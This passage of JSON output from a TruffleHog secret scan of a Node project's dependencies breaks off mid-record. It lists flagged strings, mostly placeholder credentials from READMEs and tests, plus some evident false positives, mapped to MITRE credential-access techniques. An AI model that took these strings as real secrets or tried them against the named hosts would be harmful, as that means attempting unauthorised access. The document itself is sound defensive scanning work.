18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "919e333a335f73d4", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts", "startLine": 0 }, "message": "https://abc:xyz@example.com", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts", "line": 736 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "ESCAPED_UNICODE", "Verified": false, "VerificationFromCache": true, "Raw": "https://abc:xyz@example.com", "RawV2": "https://abc:xyz@example.com", "Redacted": "https://abc:********@example.com", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "aa9f19a78a21fb70", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts", "startLine": 0 }, "message": "https://123:xyz@example.com", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts", "line": 742 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": true, "Raw": "https://123:xyz@example.com", "RawV2": "https://123:xyz@example.com", "Redacted": "https://123:********@example.com", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6d8ae777484be698", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts", "startLine": 0 }, "message": "https://abc:123@example.com", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts", "line": 577 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": true, "Raw": "https://abc:123@example.com", "RawV2": "https://abc:123@example.com", "Redacted": "https://abc:********@example.com", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "170043ac8ee06ba6", "ruleId": "GCP", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/google-auth-library/README.md", "startLine": 0 }, "message": "your-client-email", "title": "GCP secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/google-auth-library/README.md", "line": 323 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 6, "DetectorName": "GCP", "DetectorDescription": "GCP (Google Cloud Platform) is a suite of cloud computing services that runs on the same infrastructure that Google uses internally for its end-user products. GCP keys can be used to access and manage these services.", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "private key should be a PEM or plain PKCS1 or PKCS8; parse error: asn1: structure error: tags don't match (16 vs {class:1 tag:25 length:111 isCompound:true}) {optional:false explicit:false application:false private:false defaultValue: tag: stringType:0 timeType:0 set:false omitEmpty:false} pkcs1PrivateKey @2", "VerificationFromCache": false, "Raw": "your-client-email", "RawV2": "{\"type\":\"service_account\",\"project_id\":\"your-project-id\",\"private_key_id\":\"your-private-key-id\",\"private_key\":\"your-private-key\",\"client_email\":\"your-client-email\",\"client_id\":\"your-client-id\",\"auth_uri\":\"https://accounts.google.com/o/oauth2/auth\",\"token_uri\":\"https://accounts.google.com/o/oauth2/token\",\"auth_provider_x509_cert_url\":\"https://www.googleapis.com/oauth2/v1/certs\",\"client_x509_cert_url\":\"your-cert-url\"}", "Redacted": "your-client-email", "ExtraData": { "private_key_id": "your-private-key-id", "project": "your-project-id", "rotation_guide": "https://howtorotate.com/docs/tutorials/gcp/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d5d31157dd10c1ff", "ruleId": "Circle", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/ip-address/README.md", "startLine": 0 }, "message": "7baede7efd3db5f1f25fb439e97d5f695ff76318", "title": "Circle secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/ip-address/README.md", "line": 1 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 4, "DetectorName": "Circle", "DetectorDescription": "CircleCI is a continuous integration and delivery platform used to build, test, and deploy software. CircleCI tokens can be used to interact with the CircleCI API and access various resources and functionalities.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": false, "Raw": "7baede7efd3db5f1f25fb439e97d5f695ff76318", "RawV2": "", "Redacted": "", "ExtraData": { "Version": "1" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7196c7e679641da3", "ruleId": "MongoDB", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/prisma/build/index.js", "startLine": 0 }, "message": "mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true&w=majority", "title": "MongoDB secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/prisma/build/index.js", "line": 1568 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 895, "DetectorName": "MongoDB", "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup _mongodb._tcp.cluster0.ab1cd.mongodb.net on 192.168.65.7:53: no such host", "VerificationFromCache": false, "Raw": "mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true&w=majority", "RawV2": "", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f4471d3670e3b099", "ruleId": "MongoDB", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/keyv/README.md", "startLine": 0 }, "message": "mongodb://user:pass@localhost:27017/dbname", "title": "MongoDB secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/keyv/README.md", "line": 58 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 895, "DetectorName": "MongoDB", "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "context deadline exceeded", "VerificationFromCache": false, "Raw": "mongodb://user:pass@localhost:27017/dbname", "RawV2": "", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d837ea8fcf1f8062", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/websocket-driver/README.md", "startLine": 0 }, "message": "http://username:password@proxy.example.com", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/websocket-driver/README.md", "line": 177 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup proxy.example.com on 192.168.65.7:53: no such host", "VerificationFromCache": true, "Raw": "http://username:password@proxy.example.com", "RawV2": "http://username:password@proxy.example.com", "Redacted": "http://username:********@proxy.example.com", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0a6439395ad23821", "ruleId": "URI", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/zod/src/v4/classic/tests/string.test.ts", "startLine": 0 }, "message": "https://anonymous:flabada@developer.mozilla.org", "title": "URI secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/zod/src/v4/classic/tests/string.test.ts", "line": 307 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 17, "DetectorName": "URI", "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": false, "Raw": "https://anonymous:flabada@developer.mozilla.org", "RawV2": "https://anonymous:flabada@developer.mozilla.org/en", "Redacted": "https://anonymous:********@developer.mozilla.org/en", "ExtraData": null, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1dff4f66e83b2b09", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/is-url/test/index.js", "startLine": 0 }, "message": "postgres://u:p@example.com:5702", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/is-url/test/index.js", "line": 68 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "i/o timeout", "VerificationFromCache": false, "Raw": "postgres://u:p@example.com:5702", "RawV2": "postgres://u:p@example.com:5702", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "849f8848e4b2049c", "ruleId": "GitHubOauth2", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md", "startLine": 0 }, "message": "showCompletionScript", "title": "GitHubOauth2 secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md", "line": 164 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 924, "DetectorName": "GitHubOauth2", "DetectorDescription": "GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.", "DecoderName": "PLAIN", "Verified": false, "VerificationFromCache": false, "Raw": "showCompletionScript", "RawV2": "showCompletionScript027a6365b737e13116811a8ef43670196e1fa00a", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/github/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9afc5113c741a56f", "ruleId": "MongoDB", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": 